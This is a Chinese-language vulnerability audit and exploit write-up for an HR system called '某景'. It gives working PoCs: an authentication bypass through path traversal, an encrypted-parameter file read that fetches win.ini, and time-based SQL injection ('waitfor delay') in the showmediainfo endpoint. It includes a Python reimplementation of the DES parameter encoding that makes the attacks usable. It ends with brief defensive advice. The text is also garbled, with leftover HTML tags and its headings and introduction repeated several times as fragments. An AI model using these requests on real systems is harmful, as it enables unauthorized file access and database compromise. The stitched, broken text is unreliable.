某景系统漏洞审计与利用技术分析<\/h1>

0x00 前言<\/h2>
本文档详细分析某景系统中存在的多个安全漏洞，包括路径穿越绕过鉴权、文件读取漏洞和SQL注入漏洞。通过代码审计的方式，深入剖析漏洞原理，并提供完整的漏洞利用方案。<\/p>

0x01 过滤器鉴权绕过分析<\/h2>

漏洞原理<\/h3>

系统使用HireKeywordFilter<\/code>类进行接口鉴权，但存在路径穿越漏洞可绕过鉴权检查。<\/p>

关键代码分析：<\/p>

var3.<\/span>doFilter<\/span>(<\/span>var1,<\/span> var2);<\/span>  \/\/ 调用FilterChain对象的doFilter方法
<\/span><\/span><\/span><\/code><\/pre>当请求URI以\/w_selfservice\/oauthservlet<\/code>开头时，会直接放行请求。通过构造特殊路径可以绕过鉴权：<\/p>
\/w_selfservice\/oauthservlet..\/..\/
<\/code><\/pre>
利用方法<\/h3>
在请求中构造上述路径，可以访问原本需要鉴权的接口。<\/p>
0x02 漏洞审计分析<\/h2>
1. DisplayFiles文件读取漏洞<\/h3>
漏洞位置<\/h4>
web.xml<\/code>中配置的DisplayFiles<\/code>接口<\/p>
漏洞原理<\/h4>

前端接收filepath<\/code>参数<\/li>
参数经过SafeCode.decode<\/code>和PubFunc.decrypt<\/code>方法解密<\/li>
解密后的路径直接传入File<\/code>类进行文件读取<\/li>
<\/ol>
关键代码<\/h4>
\/\/ 从前端接收filepath参数
<\/span><\/span><\/span><\/span>String var3 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"filepath"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 解密处理
<\/span><\/span><\/span><\/span>var3 =<\/span> SafeCode.<\/span>decode<\/span>(<\/span>var3);<\/span>
<\/span><\/span>var3 =<\/span> PubFunc.<\/span>decrypt<\/span>(<\/span>var3);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 文件操作
<\/span><\/span><\/span><\/span>File var4 =<\/span> new<\/span> File(<\/span>var3);<\/span>
<\/span><\/span>\/\/ 读取文件内容并输出到响应
<\/span><\/span><\/span><\/code><\/pre>2. showmediainfo SQL注入漏洞<\/h3>
漏洞位置<\/h4>
web.xml<\/code>中配置的showmediainfo<\/code>接口<\/p>
漏洞原理<\/h4>

接收三个参数：

usernumber<\/code> (var3)<\/li>
i9999<\/code> (var4)<\/li>
kind<\/code> (var5)<\/li>
<\/ul>
<\/li>
参数直接拼接到SQL语句中<\/li>
usernumber<\/code>和i9999<\/code>参数存在注入点<\/li>
usernumber<\/code>参数需要解密，i9999<\/code>可直接注入<\/li>
<\/ol>
关键代码<\/h4>
String var3 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"usernumber"<\/span>);<\/span>
<\/span><\/span>String var4 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"i9999"<\/span>);<\/span>
<\/span><\/span>String var5 =<\/span> request.<\/span>getParameter<\/span>(<\/span>"kind"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ usernumber需要解密
<\/span><\/span><\/span><\/span>var3 =<\/span> PubFunc.<\/span>decrypt<\/span>(<\/span>var3);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ SQL拼接
<\/span><\/span><\/span><\/span>String sql;<\/span>
<\/span><\/span>if<\/span> (<\/span>var5.<\/span>equalsIgnoreCase<\/span>(<\/span>"0"<\/span>))<\/span> {<\/span>
<\/span><\/span>    sql =<\/span> "SELECT * FROM table WHERE usernumber='"<\/span> +<\/span> var3 +<\/span> "'"<\/span>;<\/span>
<\/span><\/span>}<\/span> else<\/span> {<\/span>
<\/span><\/span>    sql =<\/span> "SELECT * FROM table WHERE id='"<\/span> +<\/span> var4 +<\/span> "'"<\/span>;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>0x03 加解密机制分析<\/h2>
加密流程分析<\/h3>
public<\/span> static<\/span> String encrypt<\/span>(<\/span>String var0)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>null<\/span> ==<\/span> var0)<\/span> {<\/span>
<\/span><\/span>        return<\/span> ""<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        \/\/ 1. 使用SafeCode.encrypt进行DES加密
<\/span><\/span><\/span><\/span>        String var1 =<\/span> SafeCode.<\/span>encrypt<\/span>(<\/span>var0);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 特殊字符替换
<\/span><\/span><\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"%"<\/span>,<\/span> "@2HJ5@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"\\+"<\/span>,<\/span> "@2HJB@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>" "<\/span>,<\/span> "@2HJ0@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"\\\/"<\/span>,<\/span> "@2HJF@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"\\?"<\/span>,<\/span> "@3HJF@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"#"<\/span>,<\/span> "@2HJ3@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"&"<\/span>,<\/span> "@2HJ6@"<\/span>);<\/span>
<\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"="<\/span>,<\/span> "@3HJD@"<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 移除换行符
<\/span><\/span><\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"\\r\\n"<\/span>,<\/span> ""<\/span>).<\/span>replaceAll<\/span>(<\/span>"\\n"<\/span>,<\/span> ""<\/span>).<\/span>replaceAll<\/span>(<\/span>"\\r"<\/span>,<\/span> ""<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. @符号替换
<\/span><\/span><\/span><\/span>        var1 =<\/span> var1.<\/span>replaceAll<\/span>(<\/span>"@"<\/span>,<\/span> "PAATTP"<\/span>);<\/span>
<\/span><\/span>        return<\/span> var1;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>解密流程分析<\/h3>
public<\/span> static<\/span> String decrypt<\/span>(<\/span>String var0)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>null<\/span> ==<\/span> var0)<\/span> {<\/span>
<\/span><\/span>        return<\/span> ""<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        \/\/ 逆向替换操作
<\/span><\/span><\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"PAATTP"<\/span>,<\/span> "@"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJ5@"<\/span>,<\/span> "%"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJB@"<\/span>,<\/span> "\\+"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJ0@"<\/span>,<\/span> " "<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJF@"<\/span>,<\/span> "\\\/"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@3HJF@"<\/span>,<\/span> "\\?"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJ3@"<\/span>,<\/span> "#"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@2HJ6@"<\/span>,<\/span> "&"<\/span>);<\/span>
<\/span><\/span>        var0 =<\/span> var0.<\/span>replaceAll<\/span>(<\/span>"@3HJD@"<\/span>,<\/span> "="<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ DES解密
<\/span><\/span><\/span><\/span>        String var1 =<\/span> SafeCode.<\/span>decrypt<\/span>(<\/span>var0);<\/span>
<\/span><\/span>        return<\/span> var1;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>Python加解密实现<\/h3>
from<\/span> Crypto.Cipher import<\/span> DES
<\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad, unpad
<\/span><\/span>from<\/span> base64 import<\/span> b64encode, b64decode
<\/span><\/span>
<\/span><\/span>def<\/span> encrypt<\/span>(key, data):
<\/span><\/span>    key =<\/span> key.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    data =<\/span> data.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    iv =<\/span> b<\/span>'<\/span>\x01\x02\x03\x04\x05\x06\x07\x08<\/span>'<\/span>  # 初始化向量<\/span>
<\/span><\/span>    cipher =<\/span> DES.<\/span>new(key, DES.<\/span>MODE_CBC, iv)
<\/span><\/span>    ct_bytes =<\/span> cipher.<\/span>encrypt(pad(data, DES.<\/span>block_size))
<\/span><\/span>    var1 =<\/span> b64encode(ct_bytes).<\/span>decode('utf-8'<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 字符替换<\/span>
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("%"<\/span>, "@2HJ5@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("+"<\/span>, "@2HJB@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace(" "<\/span>, "@2HJ0@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("\/"<\/span>, "@2HJF@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("?"<\/span>, "@3HJF@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("#"<\/span>, "@2HJ3@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("&"<\/span>, "@2HJ6@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("="<\/span>, "@3HJD@"<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("<\/span>\r\n<\/span>"<\/span>, ""<\/span>).<\/span>replace("<\/span>\n<\/span>"<\/span>, ""<\/span>).<\/span>replace("<\/span>\r<\/span>"<\/span>, ""<\/span>)
<\/span><\/span>    var1 =<\/span> var1.<\/span>replace("@"<\/span>, "PAATTP"<\/span>)
<\/span><\/span>    return<\/span> var1
<\/span><\/span>
<\/span><\/span>def<\/span> decrypt<\/span>(key, encrypted_data):
<\/span><\/span>    key =<\/span> key.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    # 逆向字符替换<\/span>
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("PAATTP"<\/span>, "@"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJ5@"<\/span>, "%"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJB@"<\/span>, "+"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJ0@"<\/span>, " "<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJF@"<\/span>, "\/"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@3HJF@"<\/span>, "?"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJ3@"<\/span>, "#"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@2HJ6@"<\/span>, "&"<\/span>)
<\/span><\/span>    encrypted_data =<\/span> encrypted_data.<\/span>replace("@3HJD@"<\/span>, "="<\/span>)
<\/span><\/span>    
<\/span><\/span>    encrypted_data =<\/span> b64decode(encrypted_data)
<\/span><\/span>    iv =<\/span> b<\/span>'<\/span>\x01\x02\x03\x04\x05\x06\x07\x08<\/span>'<\/span>
<\/span><\/span>    cipher =<\/span> DES.<\/span>new(key, DES.<\/span>MODE_CBC, iv)
<\/span><\/span>    pt_bytes =<\/span> unpad(cipher.<\/span>decrypt(encrypted_data), DES.<\/span>block_size)
<\/span><\/span>    return<\/span> pt_bytes.<\/span>decode('utf-8'<\/span>)
<\/span><\/span><\/code><\/pre>0x04 漏洞利用POC<\/h2>
1. DisplayFiles文件读取漏洞利用<\/h3>
步骤1：加密文件路径<\/strong><\/p>
key =<\/span> "xxxxx"<\/span>  # 实际DES密钥<\/span>
<\/span><\/span>data =<\/span> "c:\/windows\/win.ini"<\/span>
<\/span><\/span>encrypted_data =<\/span> encrypt(key, data)
<\/span><\/span>print("Encrypted:"<\/span>, encrypted_data)
<\/span><\/span><\/code><\/pre>步骤2：发送恶意请求<\/strong><\/p>
POST \/templates\/attestation\/..\/..\/servlet\/DisplayFiles HTTP\/1.1
Host: target.com
User-Agent: Mozilla\/5.0
Content-Type: application\/x-www-form-urlencoded
Content-Length: 41

filepath=Iy4ZOyMhERdhPLlFrJHBaRdJo53c25S1
<\/code><\/pre>
2. showmediainfo SQL注入漏洞利用<\/h3>
情况1：i9999参数注入 (kind=1)<\/h4>
直接注入POC：<\/strong><\/p>
POST \/templates\/attestation\/..\/..\/workbench\/duty\/showmediainfo HTTP\/1.1
Host: target.com
User-Agent: Mozilla\/5.0
Content-Type: application\/x-www-form-urlencoded
Content-Length: 53

kind=1&usernumber=&i9999=12' waitfor delay '0:0:6'--+
<\/code><\/pre>
情况2：usernumber参数注入 (kind=0)<\/h4>
步骤1：加密payload<\/strong><\/p>
key =<\/span> "xxxxx"<\/span>
<\/span><\/span>data =<\/span> "1' if db_name(1)='master' waitfor delay '0:0:6'--+"<\/span>
<\/span><\/span>encrypted_data =<\/span> encrypt(key, data)
<\/span><\/span>print("Encrypted:"<\/span>, encrypted_data)
<\/span><\/span><\/code><\/pre>步骤2：发送恶意请求<\/strong><\/p>
POST \/templates\/attestation\/..\/..\/workbench\/duty\/showmediainfo HTTP\/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla\/5.0
Content-Type: application\/x-www-form-urlencoded
Content-Length: 84

kind=0&usernumber=i8hoHAILh4YkvJtIAayRbk4pSpIEAvWmx22WPMFig6wPAATTP3HJDPAATTP&i9999=
<\/code><\/pre>
0x05 防御建议<\/h2>


鉴权修复<\/strong>：<\/p>

严格校验请求路径，防止路径穿越<\/li>
对所有接口实施统一的鉴权机制<\/li>
<\/ul>
<\/li>

文件读取漏洞修复<\/strong>：<\/p>

限制可访问的文件目录<\/li>
对文件路径进行规范化处理<\/li>
实施白名单机制，只允许访问特定文件<\/li>
<\/ul>
<\/li>

SQL注入修复<\/strong>：<\/p>

使用预编译语句(PreparedStatement)<\/li>
实施参数化查询<\/li>
对输入参数进行严格校验<\/li>
<\/ul>
<\/li>

加解密机制改进<\/strong>：<\/p>

使用更安全的加密算法(AES替代DES)<\/li>
密钥不应硬编码在代码中<\/li>
实施密钥轮换机制<\/li>
<\/ul>
<\/li>

其他建议<\/strong>：<\/p>

实施WAF防护<\/li>
定期进行安全审计<\/li>
建立安全开发流程(SDL)<\/li>
<\/ul>
<\/li>
<\/ol>

某景系统漏洞审计与利用技术分析<\/h1>

0x00 前言<\/h2>
本文档详细分析某景系统中存在的多个安全漏洞，包括路径穿越绕过鉴权、文件读取漏洞和SQL注入漏洞。通过代码审计的方式，深入剖析漏洞原理，并提供完整的漏洞利用方案。<\/p>

0x01 过滤器鉴权绕过分析<\/h2>

利用方法<\/h3>
在请求中构造上述路径，可以访问原本需要鉴权的接口。<\/p>

0x02 漏洞审计分析<\/h2>

1. DisplayFiles文件读取漏洞<\/h3>

漏洞位置<\/h4>
`web.xml<\/code>中配置的DisplayFiles<\/code>接口<\/p>`

2. showmediainfo SQL注入漏洞<\/h3>

漏洞位置<\/h4>
`web.xml<\/code>中配置的showmediainfo<\/code>接口<\/p>`

0x03 加解密机制分析<\/h2>

0x04 漏洞利用POC<\/h2>

2. showmediainfo SQL注入漏洞利用<\/h3>

某景系统漏洞审计与利用技术分析<\/h1>

0x00 前言<\/h2> 本文档详细分析某景系统中存在的多个安全漏洞，包括路径穿越绕过鉴权、文件读取漏洞和SQL注入漏洞。通过代码审计的方式，深入剖析漏洞原理，并提供完整的漏洞利用方案。<\/p>

0x01 过滤器鉴权绕过分析<\/h2>

利用方法<\/h3> 在请求中构造上述路径，可以访问原本需要鉴权的接口。<\/p>

0x02 漏洞审计分析<\/h2>

1. DisplayFiles文件读取漏洞<\/h3>

漏洞位置<\/h4> web.xml<\/code>中配置的DisplayFiles<\/code>接口<\/p>

2. showmediainfo SQL注入漏洞<\/h3>

漏洞位置<\/h4> web.xml<\/code>中配置的showmediainfo<\/code>接口<\/p>

0x03 加解密机制分析<\/h2>

0x04 漏洞利用POC<\/h2>

2. showmediainfo SQL注入漏洞利用<\/h3>

0x00 前言<\/h2>
本文档详细分析某景系统中存在的多个安全漏洞，包括路径穿越绕过鉴权、文件读取漏洞和SQL注入漏洞。通过代码审计的方式，深入剖析漏洞原理，并提供完整的漏洞利用方案。<\/p>

利用方法<\/h3>
在请求中构造上述路径，可以访问原本需要鉴权的接口。<\/p>

漏洞位置<\/h4>
`web.xml<\/code>中配置的DisplayFiles<\/code>接口<\/p>`

漏洞位置<\/h4>
`web.xml<\/code>中配置的showmediainfo<\/code>接口<\/p>`